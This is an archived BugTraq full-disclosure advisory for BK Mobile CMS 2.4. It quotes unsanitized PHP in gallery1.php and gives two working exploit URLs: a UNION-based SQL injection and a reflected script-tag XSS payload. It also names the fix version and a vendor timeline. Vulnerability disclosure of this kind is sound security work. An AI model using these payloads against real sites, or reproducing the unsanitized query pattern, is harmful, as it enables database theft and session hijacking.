BugTraq
BK Mobile CMS SQLi and XSS Vulnerability Jan 27 2016 02:05PM
Rahul Pratap Singh (techno rps gmail com)
## FULL DISCLOSURE

#Product : BK Mobile CMS
#Exploit Author : Rahul Pratap Singh
#Version : 2.4
#Home page Link :
http://codecanyon.net/item/jquery-mobile-website-with-full-admin-panel/2
441358
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 27/Jan/2016

SQLi Vulnerability:

----------------------------------------
Description:
----------------------------------------
"g_name" parameter is not sanitized that leads to SQL Injection.

----------------------------------------
Vulnerable Code:
----------------------------------------
file: gallery1.php
line 5

$get_g_name = $_GET['g_name'];
$query_photos = "SELECT * FROM ".$get_prefix."photos WHERE
gallery_name='".$get_g_name."' ORDER BY id DESC";

----------------------------------------
Exploit:
----------------------------------------
http://localhost/BKMobile%20CMS/user/gallery1.php?g_name=1%27%20union%20
all%20select%201,2,3,group_concat%28version%28%29%29,5--+

----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/bk-mobile-templatesqlipoc
.png

XSS Vulnerability:

----------------------------------------
Description:
----------------------------------------
"g_name" parameter is not sanitized that leads to reflected XSS.

----------------------------------------
Vulnerable Code:
----------------------------------------
file: gallery1.php

line 81-88

<div data-role="page" id="<?php echo $get_g_name; ?>" class="jqm-demos"
<?php echo $custom_bg_active; ?>>

<?php include("../header.php"); ?>

<div role="main" class="ui-content">

<div class="jqm-block-content">
<h3><?php echo $_GET['g_name']; ?></h3>

----------------------------------------
Exploit:
----------------------------------------
http://localhost/BKMobile%20CMS/user/gallery1.php?g_name=%3Cscript%3Eale
rt%28%22XSS%22%29%3C/script%3E

----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/bk-mobile-templatexsspoc.
png

Fix:
Update to 2.5

Vulnerability Disclosure Timeline:
â?? January 14, 2015 â?? Bug discovered, initial report to Vendor
â?? January 14, 2015 â?? Vendor acknowledged
â?? January 19, 2015 â?? Vendor Deployed a Patch

#######################################
# CTG SECURITY SOLUTIONS #
# www.ctgsecuritysolutions.com #
#######################################

Pub Ref:
https://0x62626262.wordpress.com/2016/01/27/bk-mobile-cms-sqli-and-xss-v
ulnerability
http://codecanyon.net/item/jquery-mobile-website-with-full-admin-panel/2
441358

[+] Disclaimer

Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given
to the author.
The author is not responsible for any misuse of the information
contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v2.0.22 (GNU/Linux)

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
y0V0JgTl31Qj30kCJGsmmTu3IEQ=
=W24W
-----END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (GNU/Linux)

iQIcBAEBAgAGBQJWqM6sAAoJEJvdRneaz31fSEYP/2lMRrinTOmkVddHaFLrZy3J
8bJI1OllfhgNCeGPAvbMfNNcaVSZ6khLyUJpAPltgdEqADojxR1+Y2U2cb9Epibn
gvsJ+nUEy5jMeipI5036PKwldFO5p877I3I4jdAorn3tmEjCoHpP26OLqqO69ueU
KHpOYGDADlKJvnNFe2iZyqzruZV1oYAbFfK/He2H/DKxUMQHcGB7c2T5Y0hOdi6p
5Pf92g7kWhWpyj9VctHnMe04En6SzLhNxMWCAeAYp4I4KrbHa6Athqwgxwv4nDdB
bHNgqn2Wi9ySP8ZNq1hICOuGDa1+dIHsuCnj9lymiku560JoD6gEU9wCvF5p6FLv
Kp9guTvKploNG+amTrWF5aT67Vkxp26IB6F3A0Imf/lXoc3RsMNx3QYUMzgtoiHT
CICgK+tdZHZIdu8Lw3Mhq78bqUUciDjex6toKK6LautwZVpv6sEylGNACMTvz4dJ
XsWJUC6Z9pFJ78GN5AiBZ2meDIp2wAGCvHXM+I0XOTrWs4at5qV2gvnp1X8tJut2
s6lbYHqndjBN7J8oGOl7Ax+anZUjohgsslPsfyXfeuX//TGRbRV1Vn/MAJoEGu8m
tsWLLRWPHNK1SfxDAeRyim1UlMs/K2T7ZkRuPyCrkn9j7KQwU/Z5wLORkCt25B6O
pCnCNLu6c/vnmscpYO2w
=80JW
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus